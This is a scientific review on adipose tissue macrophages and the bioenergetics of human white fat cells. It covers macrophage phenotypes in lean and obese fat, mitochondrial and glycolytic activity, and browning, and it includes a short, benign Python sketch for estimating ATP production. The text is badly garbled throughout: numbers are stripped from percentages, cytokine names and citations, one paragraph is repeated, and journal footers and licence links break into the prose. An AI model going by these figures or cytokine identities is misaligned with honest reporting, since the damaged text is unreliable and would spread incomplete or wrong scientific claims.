atmΦ exert distinct physiological roles and beneficial effects on wat homeostasis, for example, healthy lipid storage ( , , , , ) (fig. c). atmΦ are dynamic cells and they quickly adapt their phenotype and metabolism to changing environments, for example during fasting-induced wat lipolysis ( , ) and overnutrition ( ). atmΦ stimulate healthy lipid storage and therefore prevent adverse ectopic lipid storage in other organs (e.g. hepatic steatosis). anti- and pro-inflammatory signals seem to be involved in maintaining wat homeostasis: healthy wat expansion is impaired by ablating tissue-resident atmΦ (anti-inflammatory m ) ( ) or by reducing pro-inflammatory signals in murine wat ( ). recently, atmΦ function has been implicated in cold adaptation and exercise of mice ( , ). il -activated mΦ appear to be part of an anti-inflammatory signaling cascade contributing to cold-induced browning and recruitment of beige adipocytes in scwat ( , , , , , ). the underlying molecular mechanisms, however, and some of the reported effects have been controversially discussed ( , ). the potential role of atmΦ in browning will be detailed in later sections.

atmΦ display a mixed phenotype in obese wat
one of the first studies investigating atmΦ proposed a phenotypic switch during obesity: while resident m -like atmΦ dominate in lean wat, pro-inflammatory (m ) atmΦ dominate in obese wat ( ). the stressed, obese wat is marked by elevated levels of fatty acids and lps, which can activate tlr signaling to polarize mΦ toward the pro-inflammatory m phenotype ( ). thus, atmΦ can resemble the phenotype of lps- and ifnγ-activated mΦ during diet-induced obesity ( , , ). this simplified classification of anti- (m ) vs pro- (m ) inflammatory activated mΦ, however, does not reflect the actual situation in vivo, where a spectrum of mixed markers is found ( ). notably, there are also species differences on the molecular level between human and murine atmΦ. for example, the markers commonly used for murine mΦ polarization, such as inducible nitric oxide synthase (inos) and arginase (arg ), are barely expressed in human atmΦ ( , , , ). recently, several different atmΦ subtypes have been identified in obese human wat expressing macrophage activation markers of both the m spectrum (e.g. cd c) and the m spectrum (e.g.
cd , cd ) ( , , , , ). additionally, human atmΦ displaying m surface markers are capable of secreting both pro- and anti-inflammatory cytokines ( ). cd c+ atmΦ show a reduced pro-inflammatory profile after weight loss ( ). thus, in particular during obesity, atmΦ cannot be classified using the simple dual m /m model. a new category of mΦ, termed 'metabolically' activated mΦ, was recently proposed, which can be activated by the wat-specific environment (hormones and nutrients) ( ). indeed, the wat-specific microenvironment and/or the long retention time of mΦ in wat during obesity may be the cause of the unique phenotype of atmΦ. data on monocytes/mΦ during obesity reveal higher immigration rates into obese wat ( ) and lower emigration rates ( ), indicating longer exposure times for atmΦ in the wat microenvironment during obesity. dissecting the different spatiotemporal phenotypes of human atmΦ, including their secreted cytokines, chemokines and other factors, either during acute or chronic metabolic challenges (e.g. feeding/fasting, different diets, exercise, cold), is a challenging task. however, such studies would yield further insights into the role of atmΦ in wat metabolism and dysfunction, including the potential to distinguish and classify subgroups of obese patients with a high risk for certain obesity-associated metabolic complications (e.g. nafld, cardiovascular complications). in summary, atmΦ assist the maintenance of normal tissue function, such as adipokine secretion, healthy lipid storage and adaptation toward metabolic challenges (e.g. cold, exercise, fasting) (fig. c). in obesity, the amount of atmΦ increases through the combination of proliferation, immigration and retention. atmΦ accumulate around dead adipocytes in crown-like structures and change their phenotype. indeed, atmΦ of the obese display altered secretion profiles, surface marker expression and metabolic function, thereby contributing to the overall (dys)function of wat, which will eventually impact whole-body metabolic homeostasis.

the bioenergetics of human white fat cells
mitochondrial activity is important for lipid storage and secretory function of human white adipocytes
synthesis of atp through oxidative phosphorylation (oxphos) is a major function of mitochondria to provide sufficient cellular energy. therefore, energy-demanding adipose-specific functions, such as endocrine signaling and lipid storage, highly depend on adequate mitochondrial activity. indirectly, mitochondria also control free fatty acid (fa) levels as a consequence of lipid storage control. beyond atp production, mitochondria also generate metabolic intermediates that are required for de novo lipogenesis. for example, the mitochondrial pyruvate dehydrogenase complex (pdh) decarboxylates pyruvate to acetyl-coa, and thereby regulates glyceroneogenesis and the metabolic switch from glucose to lipid metabolism ( ). a similar regulating role of mitochondria is found for the reverse process of lipolysis, the breakdown of lipids. lipolysis and mitochondrial activity are closely linked, as mitochondria facilitate lipolysis through fa oxidation. furthermore, free fa can uncouple mitochondrial respiratory chain activity from atp synthesis and enhance respiratory activity, while inhibitors of mitochondrial atp production can abolish catecholamine-stimulated lipolysis ( , , ). mitochondria are also important players in the regulation of ca + homeostasis ( ), tying into the well-documented calcium-dependent processes in adipocytes during insulin-stimulated glucose uptake, leptin secretion and adipogenesis ( , , , , ). furthermore, adequate mitochondrial activity is required to execute the endocrine function of wat (e.g. adiponectin secretion ( )). finally, the basic processes of adipocyte differentiation and maturation are closely linked to the initiation of de novo mitochondrial biogenesis and reactive oxygen species (ros) production ( , ). collectively, mitochondrial activity of adipocytes has an impact on all the essential and specialized functions of wat, even those that remotely control the processes that maintain systemic homeostasis.
mitochondria are also important players in the regulation of ca + homeostasis ( ), tying into the well- documented calcium-dependent processes in adipocytes during insulin-stimulated glucose uptake, leptin secretion and adipogenesis ( , , , , ). furthermore, adequate mitochondrial activity is required to execute the endocrine function of wat (e.g. adiponectin secretion ( )). finally, the basic processes of adipocyte differentiation and maturation are closely linked to the initiation of de novo mitochondrial biogenesis and reactive oxygen species (ros) production ( , ). collectively, mitochondrial activity of adipocytes has an impact on all the essential and specialized functions of wat, even those that control distantly the processes that maintain systemic homeostasis. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : the bioenergetic profile of (pre-)adipocytes and the regulation by nutrients and hormones as most proliferating progenitor cells, human subcutaneous preadipocytes depend mainly on glycolytic atp production (~ % from glycolysis vs % from oxphos, fig.  ) ( ). during adipogenic differentiation, the mitochondrial content increases several fold ( ) and the relative contribution of oxphos to total atp production increases to – % in human adipocytes ( , ). comparing mitochondrial oxygen consumption rates (ocrs) revealed four- to five-fold higher ocr in adipocytes as compared with preadipocytes (sgbs and primary cells) ( , ). of note, at least under in vitro conditions, glycolysis seems to be the preferred energy-producing pathway in both, preadipocytes and mature adipocytes. adipocytes partially switch from oxphos to glycolysis in the presence of glucose. in the absence of glucose, however, only adipocytes, but not preadipocytes, are able to maintain their atp demand by increasing mitochondrial activity. therefore, mitochondria in human adipocytes allow for the high flexibility in substrate choice to maintain their energy metabolism ( ). visceral adipocytes show lower mitochondrial activity than subcutaneous, when calculated per cell and normalized for mitochondrial content ( , ). when comparing isolated mitochondria from subcutaneous and visceral adipocytes, no significant difference in mitochondrial function was observed ( ). this indicates that differences in energy metabolism between visceral and subcutaneous adipocytes, and wat depots, do not depend on intrinsic mitochondrial capacity. instead, cellular capacity of oxphos may depend on mitochondrial mass per cell (e.g. higher mitochondrial density in visceral than subcutaneous adipocytes ( )), the control of mitochondrial function at the cellular level (e.g. higher beta- adrenergic receptor mrna levels in viscwat than in scwat ( )) and the depot-specific surrounding (e.g. higher vascularization in viscwat than scwat ( )), including the inflammatory environment created by mΦ (higher concentration of cytokines such as il in viscwat than scwat ( )). 
upon adrenergic activation, subcutaneous adipocytes of lean humans display increased ocr that associates with increased lipolysis ( ). in parallel, extracellular acidification rates (ecars), which estimate glycolytic activity, are increased ( ). notably, the extracellular acidification may also derive from increased carbon dioxide production by the tca cycle (dissolved as carbonic acid) and is therefore partially unrelated to glycolysis. insulin stimulation of subcutaneous adipocytes from obese donors leads to increased glycolytic activity and, simultaneously, to decreased atp-linked respiration ( ). whether this response is different in adipocytes from lean donors, or different in visceral adipocytes, needs to be determined. overall, the high capacity of mitochondrial oxphos, which is linked to triacylglycerol/fa cycling activity and induced by hormones and nutrients, is essential for the metabolic flexibility of wat ( , , ), representing a marker of healthy adipocytes (fig. ).

figure: the dynamics of adipocyte energy metabolism. oxygen consumption rates (ocrs), representing mitochondrial function, are plotted against extracellular acidification rates (ecars), representing an estimate of glycolytic activity. both pathways fuel cellular atp demands, are complementary and display metabolic flexibility, in particular in healthy, lean adipocytes (orange). preadipocytes (yellow) display lower ocr, higher ecar and less metabolic flexibility. during adipogenic differentiation, glycolytic atp production is replaced by oxidative phosphorylation (oxphos). oxphos increases about five-fold, and its contribution to cellular atp increases from % in preadipocytes (yellow circle) to ~ % in adipocytes (orange circle) under basal, normoglycemic conditions. adipocytes in lean wat display high flexibility of ocr and ecar, depending on nutrient availability (e.g. glucose: % oxphos in hyperglycemic (green circle) and % oxphos in hypoglycemic (blue circle) conditions), on hormonal input (e.g. catecholamine (brown circle) induces simultaneous glycolysis and oxphos = increased metabolic activity; insulin (green circle) suppresses oxphos and increases glycolysis = metabolic shift), and on inflammatory mediators (e.g. tnfα (pink circle) is suspected to reduce ocr and ecar = metabolic depression).
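the relative contributions of oxphos and glycolysis to cellular atp production discussed above can be approximated from ocr and ecar measurements; the sketch below is a minimal illustration under assumed, simplified conversion factors, not the calculation used in the studies cited here, and all names and numbers are placeholders.

```python
# minimal sketch for estimating oxidative vs glycolytic atp production from
# extracellular-flux data; the conversion factors are simplified, assumed
# values for illustration only.
def atp_rates(ocr_total, ocr_oligomycin, lactate_rate,
              p_o_ratio=2.5, atp_per_lactate=1.0):
    """return (oxidative atp rate, glycolytic atp rate, % atp from oxphos).

    ocr_total      : basal mitochondrial oxygen consumption (pmol o2/min)
    ocr_oligomycin : ocr remaining after blocking atp synthase, i.e. the
                     proton-leak component (pmol o2/min)
    lactate_rate   : lactate efflux estimated from the lactate-linked part
                     of ecar (pmol lactate/min); note that tca-derived co2
                     also acidifies the medium, as stated in the text
    p_o_ratio      : assumed atp made per oxygen atom reduced
    atp_per_lactate: atp yielded per lactate exported by glycolysis
    """
    ocr_atp = max(ocr_total - ocr_oligomycin, 0.0)  # atp-linked respiration
    j_atp_ox = ocr_atp * 2 * p_o_ratio              # two o atoms per o2
    j_atp_glyc = lactate_rate * atp_per_lactate
    total = j_atp_ox + j_atp_glyc
    return j_atp_ox, j_atp_glyc, (100 * j_atp_ox / total if total else 0.0)

# toy numbers: an adipocyte-like profile (mostly oxphos) vs a
# preadipocyte-like profile (mostly glycolysis)
print(atp_rates(ocr_total=100, ocr_oligomycin=30, lactate_rate=150))
print(atp_rates(ocr_total=20, ocr_oligomycin=8, lactate_rate=300))
```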
the depression of atp metabolism in adipocytes from obese donors is supported by data on lower mitochondrial activity, reduced lipid accumulation and insulin-stimulated glucose uptake, as compared to sgbs adipocytes, which represent a model for lean, insulin-sensitive human white subcutaneous adipocytes ( ). in line with these observations, previous studies on basal heat production of primary (‘floating’) adipocytes from lean vs obese humans revealed an obesity-related reduction in heat output by ~ % ( ). interestingly, not only impaired mitochondrial function but also altered glycolytic activity in adipocytes is associated with obesity. higher lactate secretion of wat from obese patients has been reported previously, indicating higher glycolytic fluxes, impaired conversion of lactate to pyruvate and/or impaired pyruvate import into the mitochondria ( , , ). this is in line with suggestions on the increased requirement of glycolytic energy production during insulin resistance ( ). under hypoxic condition, adipocytes show increased glucose uptake, leading to glycogen accumulation that has been linked to impaired adipokine secretion ( ). additionally, mitochondrial uncoupling in adipocytes, either induced by overexpressing uncoupling protein (ucp ) or by administration of chemical uncouplers such as fccp, results in less atp yield from oxphos. this is usually compensated by the increase of glycolytic energy production. if the compensation fails to maintain atp homeostasis, adipocytes show reduced lipid accumulation, possibly by diverting glucose-derived carbon flux away from fatty acid synthesis into lactate production ( , , , ). this reduction in lipid accumulation capacity of adipocytes may lead to the adverse lipid accumulation in other organs (e.g. nafld), a commonly seen feature in metabolically unhealthy obese patients ( ). thus, appropriate functionality, balance and regulation of the main energy-producing pathways, oxidative phosphorylation and glycolysis, is important for metabolic flexibility to retain healthy adipocytes. any perturbation of these metabolic processes leads to metabolic imbalances and adverse outcomes for the whole metabolic system of the body. in summary (fig.  ), healthy adipocytes possess the adequate mitochondrial mass and activity, allowing a wide scope of metabolic responses to hormones such as insulin and adrenaline. mitochondrial function is required for insulin-stimulated glucose metabolism and adrenergic-stimulated oxphos capacity, allowing for rapid adjustments of energy metabolism. obesity is characterized by lower mitochondria number and activity, altered basal/insulin-stimulated glucose metabolism and figure  obesity-associated impaired energy metabolism in white adipocytes. in lean wat, high mitochondrial mass and activity in adipocytes allow for high metabolic flexibility. oxphos and glycolysis are adjusted in response to hormonal regulation (insulin and adrenergic activation). visceral adipocytes display lower mitochondrial activity than subcutaneous adipocytes (normalize per cell and mitochondrial content). contrasting lean wat, obese wat is characterized by lower mitochondrial mass and activity, impaired glucose metabolism and dampened hormonal responses. obesity overall renders adipocytes metabolically inflexible. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : lower adrenergic-stimulated oxphos. therefore, it is not surprising that unhealthy adipocytes are less metabolically flexible. linking atmΦ to human adipocyte bioenergetics metabolically healthy (vs unhealthy) obesity is characterized by dampened inflammatory molecular signatures in wat and lower levels of circulating inflammation markers (tnfα and hcrp) ( , , , ). together, this indicates the link between inflammation and dysregulated metabolism. early observations by weisberg et  al. that showed obesity- associated increases in atmΦ content, also reported on the decreased expression of several mitochondria-related genes ( ). cytokines are potential candidates mediating the crosstalk between atmΦ and the energy metabolism of adipocytes (fig.  ). typical cytokines involved in wat inflammation are tnfα, il and il β. these cytokines promote insulin resistance and/or induce lipolysis ( , , , ). notably, some of these and other cytokines suppress mitochondrial function ( ) (fig.  b). the crosstalk between atmΦ and adipocytes is certainly bidirectional, and dysfunctional adipose mitochondria possibly promote wat inflammation as well ( ). this review, however, will focus on the effects of atmΦ in controlling adipocyte mitochondria. in vivo, the paracrine interactions between atmΦ and adipose cells are complex, as mΦ are very dynamic cells with a changing cytokine profile that is influenced by adipokines ( , ), sympathetic nerve activation ( ), as well as insulin and nutrients ( ). atmΦ could represent a distinct subpopulation in wat with a unique, not yet fully characterized phenotype that is altered during obesity (as discussed in the sections above). thus, studying ex vivo the effects of mΦ-conditioned media, which represent the global secretome of mΦ, provides only a rudimentary picture of the effects that mΦ-derived products impose on fat cell bioenergetics. this ex vivo system, however, enables us to identify the factors, signaling pathways and mechanisms that can be further investigated and targeted in vivo to modulate mitochondrial function of adipocytes. atmΦ and secreted factors affect glucose metabolism/glycolysis of adipocytes using conditioned media from lps-activated mΦ (mΦ- cm), lumeng et al. observed higher basal glucose uptake in adipocytes in a murine cell culture system ( t -l adipocytes and raw . or j macrophages) ( ). in line with this, we demonstrated higher glycolytic activity in adipocytes after incubation with either lps/infγ-activated mΦ-cm or il /tgfβ-activated mΦ-cm ( ), using a human model system composed of sgbs cells, a human subcutaneous adipocyte model figure  control of adipocyte energy metabolism. in the wat-specific environment (yellow background), multiple cytokines/chemokines, metabolites, lipid species and hormones from diverse cell types within wat and/or circulation can exert either positive (upper box, a) or negative (lower box, b) effects on wat metabolism. these factors control mitochondrial function of (pre-)adipocytes either directly and/or indirectly by first affecting the atmΦ secretion profile. 
notably, the composition of released factors depends on mΦ activation (known for the factors written in blue/green). depending on the member of the tgfβ superfamily (bmps and gdfs), wat metabolism is either promoted or suppressed. a recently identified but controversially discussed mechanism of mΦ-invoked browning and enhanced wat metabolism is the secretion of catecholamines by il -activated mΦ during cold and exercise (upper box, a). on the contrary, nams/sams (lower box, b), which represent mΦ in close proximity to neurons/axons, may reduce local catecholamine levels and thus suppress mitochondrial function of adipocytes with age and obesity.

overall, atmΦ possess the potential to increase basal glucose uptake in adipocytes. the potentially responsible factors comprise the classical inflammatory cytokines associated with obese wat inflammation, such as tnfα and il β. controversial reports exist for il , a cytokine that has often been associated with wat inflammation ( , , ). furthermore, a few studies report reduced insulin-stimulated glucose uptake after exposing adipocytes either to different mΦ-cm or to cytokines such as tnfα, ccl and il β, which is mostly linked to decreased activation of insulin signaling cascades ( , , , , ). of note, many studies show the percentage or fold-change of glucose uptake vs vehicle ( nm insulin), not fully excluding the possibility that the reduced response in these studies may be due, at least partially, to increased basal glucose uptake.

the molecular identity of atmΦ-released factors reducing adipose energy metabolism

maintenance of cellular homeostasis requires a constant production of atp unless specific, energy-demanding tasks are performed. therefore, increased basal glucose uptake may reflect increased energy demand. however, increased basal glucose uptake may equally reflect a compensatory mechanism to counteract decreased oxphos activity (atp-linked respiration). the latter scenario describes a switch in the energy-producing pathways rather than an increase in metabolic activity. il /tgfβ-activated mΦ and/or il β promote such a metabolic switch in adipocytes by increasing glucose uptake/glycolysis while simultaneously decreasing mitochondrial activity ( , ) (fig. b). il β also inhibits camp- and isoproterenol-induced pgc a and ucp mrna levels ( , ), further supporting a role for il β signaling in suppressing oxidative metabolism of adipocytes. tnfα represents a cytokine that appears to reduce both major energy-producing pathways, glycolysis and oxphos. the lowered production of cellular energy subsequently results in adipocyte death, finally seen as loss of mitochondrial membrane potential and cleaved caspase- ( ). notably, tnfα levels and mitochondrial mass correlate negatively in human wat ( , ).
whether the secretome of the 'metabolically' activated mΦ found in obese wat ( ) is significantly involved in decreased adipose mitochondrial function is not yet known (fig. b). atmΦ and their secreted factors may, however, not only directly affect adipocyte energy metabolism but also act indirectly by altering neuronal signals into the tissue. one of those signals is catecholamine, which enhances energy dissipation. two mechanisms have been described by which mΦ may limit bioactive catecholamine in wat and brown adipose tissue (bat). one mechanism proposes the inhibition of neuronal innervation: bat-specific mΦ inhibit sympathetic neuronal innervation and thereby impair catecholamine signaling in bat, while wat innervation is not affected ( ). the other mechanism proposes neurotransmitter clearance: a distinct mΦ type that is attached, or at least in close proximity, to axons of the sns takes up and degrades norepinephrine (ne). these mΦ have been termed either sympathetic neuron-associated mΦ (sams) ( ) or nerve-associated mΦ (nams) ( ). so far, sams/nams have been identified in murine viscwat ( ) and scwat ( ), but not unequivocally in murine bat ( ). sams/nams may regulate local catecholamine concentrations and prevent catecholamine spillover into the circulation ( , , ). the mΦ-mediated ne uptake and degradation system is apparently enhanced during obesity (increased number of sams ( )) and aging (gdf -dependent increased expression of genes controlling ne degradation in nams ( )), and potentially contributes to decreased energy metabolism with age and obesity (fig. b).

mediators between atmΦ and increased adipose energy metabolism

the interaction between atmΦ and increased wat energy metabolism is supported by mouse models that claim the involvement of mΦ in the 'browning' of wat upon cold exposure, exercise and caloric restriction ( , , , , ) (fig. a). browning of wat has been classically defined as the upregulation of uncoupling protein (ucp ) and the appearance of multilocular adipocytes in wat, termed beige adipocytes. beige adipocytes are associated with mitochondrial biogenesis and higher energy turnover. ucp resides in the mitochondrial inner membrane and uncouples the proton motive force from atp synthesis, thereby directly releasing energy as heat and accelerating catabolic processes. with this energy-burning machinery, the browning of wat can restore dysregulated glucose and lipid metabolism in diverse obese and diabetic mouse models ( , , , ). with these observations in mouse models, browning-inducing pathways have gained remarkable attention in biomedicine as a means to treat metabolic diseases. in the context of browning, atmΦ may release cytokines that could induce ucp expression, higher energy turnover and energy wasting in adipocytes (fig. a). several publications implicate il signaling in beige adipocyte formation and wat browning ( , , ), but some aspects of il -stimulated glucose uptake are controversial ( , , , ).
another cytokine that affects wat energy metabolism, either directly or via mΦ, is il (fig. a). il is secreted by mΦ and, to a higher extent, by eosinophils in wat ( ). it may directly control wat metabolism by acting either on preadipocytes to promote differentiation into beige adipocytes, or on adipocytes to induce higher atp turnover ( , ). several publications place il -activated mΦ within immune signaling cascades that are able to induce ucp expression and mitochondrial activity in adipocytes. the il -mΦ axis can be modulated by additional factors of endocrine (e.g. released distantly from muscle ( )) and/or paracrine nature (e.g. released adjacently from other wat cell types, including eosinophils, type innate lymphoid cells, regulatory and natural killer t cells ( , , )). the underlying mechanisms by which the il -mΦ system induces browning are not fully understood. in particular, the involvement of catecholamine-producing atmΦ is controversially discussed ( , ). although some reports on catecholamine synthesis in mΦ exist ( , , ), its physiological contribution during cold-induced thermogenesis seems to be of minor importance ( ). whether mΦ-mediated uptake ( ) or degradation of catecholamines (as shown for sams/nams ( , )) is inhibited and substantially contributes to cold-induced wat browning requires further investigation. additional candidates that impact mitochondrial function in adipocytes belong to the tgfβ superfamily. tgfβ inhibits the 'browning' of wat and stimulates proliferation of white adipocytes ( , , , ). our functional work demonstrated that factors secreted by il /tgfβ-activated mΦ decrease atp-linked respiration in human subcutaneous adipocytes, thus providing evidence for indirect suppression of mitochondrial respiration by tgfβ ( ). several other members of the tgfβ superfamily have been proposed to regulate oxidative metabolism in adipocytes and the browning of wat, affecting whole-body energy metabolism. many of these factors are indeed secreted by mΦ. whether these factors promote or suppress energy metabolism depends on the distinct factor or receptor, as well as on the adipose depot (bat or wat). examples of specific effects include bone morphogenetic proteins (bmp , , and b) ( , , , , , , ) and growth differentiation factors (gdf , , , ) ( , , , , , , ) (fig. a and b). the effects also depend on the developmental stage of the adipocytes: whether the cytokine acts directly on the mesenchymal stem cell, on the early committed preadipocytes (brown, beige or white) or on the adipocytes, or whether the cytokine acts indirectly by changing mΦ infiltration and their phenotype ( , ). additionally, there are reports that these cytokines act on the central nervous system to control metabolism ( , ). other mediators between atmΦ and adipocyte metabolism are metabolites. upon activation, mΦ change their metabolomic profile ( , ); for example, upon lps activation more lactate and pyruvate are released ( ). lactate and acetate have been suggested as inducers of wat browning ( , , ). lipid mediators (e.g. oleoylethanolamine (oea), prostaglandin e (pge )) are differentially released by mΦ, depending on the mode of activation ( , , ). circulating metabolites and lipid mediators are involved in the browning of rodent wat ( , , ), indicating that these factors represent additional candidates by which mΦ modulate mitochondrial activity in white adipocytes (fig. a).
although mΦ may not be the main source of some cytokines or factors that have been linked to increased or decreased energy expenditure in wat (e.g. ifnγ, retinoic acid, catecholamine, il , lactate), the indirect involvement of these factors cannot be formally excluded ( , , , , , ). for instance, we have recently found increased atp-linked respiration in white adipocytes after exposure to the secreted factors of lps/ifnγ-activated mΦ ( ) (fig. a).

in summary (fig. ), atmΦ can be activated by the wat-specific microenvironment, which is impacted by circulating endocrine and auto-/paracrine factors (cytokines, nutrients and hormones). thus, the wat-specific environment is characterized by distinctly activated atmΦ and mΦ-secreted factors, which contribute to the microenvironment and, furthermore, to the regulation of wat energy metabolism. during cold, exercise and fasting, the induction of adipose energy metabolism, by enhancing beige adipocyte differentiation, inducing ucp expression, increasing atp turnover and/or increasing energy-dissipating pathways such as catecholamine signaling, can be mediated by activated mΦ (e.g. lps/ifnγ- or il -activated mΦ) and mΦ-released factors such as cytokines (il , il ), metabolites (lactate, acetate) and/or lipid mediators (pge , oea) (fig. a). in the obese state, other activated mΦ (e.g. il /tgfβ- or 'metabolically' activated mΦ) and mΦ-released factors such as cytokines (e.g. il β and tnfα) may decrease the energy metabolism of adipocytes or limit local energy-dissipating pathways through uptake and degradation of catecholamines (by sams, nams) (fig. b). several scenarios for how these factors operate are conceivable, and they most likely overlap and work in concert, through direct action on mesenchymal stem cells, preadipocytes and adipocytes and through indirect signals via mΦ. indirect action may also occur via additional cell types in wat, including other immune cells (e.g. t cells), epithelial cells and neurons (not depicted in fig. ).

conclusion and outlook

in the upcoming field of immunometabolism, which investigates the crosstalk between immune cell function and metabolic homeostasis, understanding the paracrine regulation of human white adipocyte metabolism by atmΦ is of utmost importance. by identifying the atmΦ-secreted factors that control mitochondrial function and energy metabolism in adipocytes, we may be able to find novel therapeutic targets to treat diseased wat during obesity. this new understanding of the metabolic network in wat needs to be resolved at the molecular level, investigating how the controlling pathways are regulated under physiological and pathophysiological conditions. a detailed investigation is required of the atmΦ phenotypes/subpopulations and of how fat depot-, gender- and age-specific atmΦ infiltration and activation relate to adipocytes, wat and whole-body metabolism in health and disease.
although this review focuses on the paracrine action of mΦ within the white adipose tissue, it should be considered that atmΦ contribute to the overall secretion profile of wat with factors that are released into the circulation for endocrine action, causing systemic effects such as insulin resistance. it is reasonable to speculate that these factors not only impact the energy metabolism of adipocytes but, as endocrine factors, also potentially impact the bioenergetics of more distantly located target cells (such as hepatocytes and myocytes). furthermore, not only does mΦ composition change with obesity, but other immune cells, such as t cells, b cells, eosinophils, inkt cells and neutrophils, also change in number and activation state, contributing to the impaired immune balance in obese wat. thus, the complex microenvironment of adipose tissue that controls the bioenergetics of adipocytes is composed of multiple cytokines and cell types with multiple cellular targets. additionally, there is potentially a feedback mechanism in place whereby adipocyte-secreted proteins and signals impact the immune cell secretome that in turn controls adipocyte metabolism. how the endocrine and nervous systems that regulate metabolism (e.g. catecholamines, acetylcholine, insulin and glucagon) affect the crosstalk of atmΦ and fat cells represents another promising research topic. many other aspects require further investigation, concerning cytokine production and combinatorial effects on adipocytes, the interaction with energy-storing and energy-dissipating pathways, as well as the crosstalk between adipocytes and cell types other than atmΦ in controlling adipocyte glycolysis and mitochondrial function. owing to the profound differences in the immune system between mice and humans, it is of major importance to consolidate murine pathways and their impact on metabolism in humans. that said, it is promising that certain activated mΦ can induce energy-producing pathways (glycolysis and oxphos) in white adipocytes, possibly in a ucp -independent manner, suggesting new options to increase energy expenditure by targeting inflammatory pathways in wat. novel strategies in obesity therapy are required, as obese and older subjects are usually characterized by the absence or low content of bat (ucp +-cells) ( ). whether the browning capacity of human subcutaneous wat can be enhanced to the extent that it eventually contributes significantly to systemic energy expenditure is still an open question ( , ). beyond energy wasting in adipocytes, mitochondria are crucial for all cellular pathways (e.g. differentiation, apoptosis, energy dissipation, adipokine secretion), thus representing ubiquitous targets to treat obesity and its associated disorders. collectively, targeting inflammatory pathways in fat depots could be a feasible strategy for the treatment of metabolic diseases.

declaration of interest

the author declares that there is no conflict of interest that could be perceived as prejudicing the impartiality of this review.

funding

the original work of m k was supported by the german center for diabetes research (dzd) and the german diabetes association (ddg).

acknowledgments

the author would like to thank martin jastroch for helpful comments on the manuscript and proofreading. figures were created using modified components from servier medical art (https://smart.servier.com).
references

jansson pa, larsson a, smith u & lönnroth p. lactate release from the subcutaneous tissue in lean and obese men. journal of clinical investigation.
kershaw ee & flier js. adipose tissue as an endocrine organ. journal of clinical endocrinology and metabolism.
trayhurn p. endocrine and signalling role of adipose tissue: new perspectives on fat. acta physiologica scandinavica.
kaaman m, sparks lm, van harmelen v, smith sr, sjölin e, dahlman i & arner p. strong association between mitochondrial dna copy number and lipogenesis in human white adipose tissue. diabetologia.
kusminski cm & scherer pe. mitochondrial dysfunction in white adipose tissue. trends in endocrinology and metabolism.
koh eh, park jy, park hs, jeon mj, ryu jw, kim m, kim sy, kim ms, kim sw, park is, et al. essential role of mitochondrial function in adiponectin synthesis in adipocytes. diabetes.
wang ch, wang cc, huang hc & wei yh. mitochondrial dysfunction leads to impairment of insulin sensitivity and adiponectin secretion in adipocytes. febs journal.
szkudelski t, nogowski l & szkudelska k. short-term regulation of adiponectin secretion in rat adipocytes. physiological research.
yin x, lanza ir, swain jm, sarr mg, nair ks & jensen md. adipocyte mitochondrial function is reduced in human obesity independent of fat cell size. journal of clinical endocrinology and metabolism.
heinonen s, buzkova j, muniandy m, kaksonen r, ollikainen m, ismail k, hakkarainen a, lundbom j, lundbom n, vuolteenaho k, et al. impaired mitochondrial biogenesis in adipose tissue in acquired obesity. diabetes.
pietiläinen kh, naukkarinen j, rissanen a, saharinen j, ellonen p, keränen h, suomalainen a, götz a, suortti t, yki-järvinen h, et al. global transcript profiles of fat in monozygotic twins discordant for bmi: pathways behind acquired obesity. plos medicine.
fischer b, schöttl t, schempp c, fromme t, hauner h, klingenspor m & skurk t. inverse relationship between body mass index and mitochondrial oxidative phosphorylation capacity in human subcutaneous adipocytes. american journal of physiology: endocrinology and metabolism.
yehuda-shnaidman e, buehrer b, pi j, kumar n & collins s. acute stimulation of white adipocyte respiration by pka-induced lipolysis. diabetes.
hotamisligil gs, shargill ns & spiegelman bm. adipose expression of tumor necrosis factor-alpha: direct role in obesity-linked insulin resistance. science.
xu h, barnes gt, yang q, tan g, yang d, chou cj, sole j, nichols a, ross js, tartaglia la, et al. chronic inflammation in fat plays a crucial role in the development of obesity-related insulin resistance. journal of clinical investigation.
cai d, yuan m, frantz df, melendez pa, hansen l, lee j & shoelson se. local and systemic insulin resistance resulting from hepatic activation of ikk-beta and nf-kappab. nature medicine.
lanthier n, molendi-coste o, horsmans y, van rooijen n, cani pd & leclercq ia. kupffer cell activation is a causal factor for hepatic insulin resistance. american journal of physiology: gastrointestinal and liver physiology.
saghizadeh m, ong jm, garvey wt, henry rr & kern pa. the expression of tnf alpha by human muscle. relationship to insulin resistance. journal of clinical investigation.
de souza ct, araujo ep, bordin s, ashimine r, zollner rl, boschero ac, saad mj & velloso la. consumption of a fat-rich diet activates a proinflammatory response and induces insulin resistance in the hypothalamus. endocrinology.
ehses ja, perren a, eppler e, ribaux p, pospisilik ja, maor-cahn r, gueripel x, ellingsgaard h, schneider mkj, biollaz g, et al. increased number of islet-associated macrophages in type diabetes. diabetes.
bondia-pons i, ryan l & martinez ja. oxidative stress and inflammation interactions in human obesity. journal of physiology and biochemistry.
hahn ws, kuzmicic j, burrill js, donoghue ma, foncea r, jensen md, lavandero s, arriaga ea & bernlohr da. proinflammatory cytokines differentially regulate adipocyte mitochondrial metabolism, oxidative stress, and dynamics. american journal of physiology: endocrinology and metabolism.
qatanani m, tan y, dobrin r, greenawalt dm, hu g, zhao w, olefsky jm, sears dd, kaplan lm & kemp dm. inverse regulation of inflammation and mitochondrial function in adipose tissue defines extreme insulin sensitivity in morbidly obese patients. diabetes.
weisberg sp, mccann d, desai m, rosenbaum m, leibel rl & ferrante aw. obesity is associated with macrophage accumulation in adipose tissue. journal of clinical investigation.
wernstedt asterholm i, tao c, morley ts, wang qa, delgado-lopez f, wang zv & scherer pe. adipocyte inflammation is essential for healthy adipose tissue expansion and remodeling. cell metabolism.
